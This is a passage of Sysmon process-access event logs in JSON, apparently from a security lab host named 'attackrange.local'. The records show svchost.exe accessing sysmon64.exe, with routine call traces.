Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3839,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3840,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3841,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3842,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3843,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3844,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3845,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:52.877\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:52.877","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
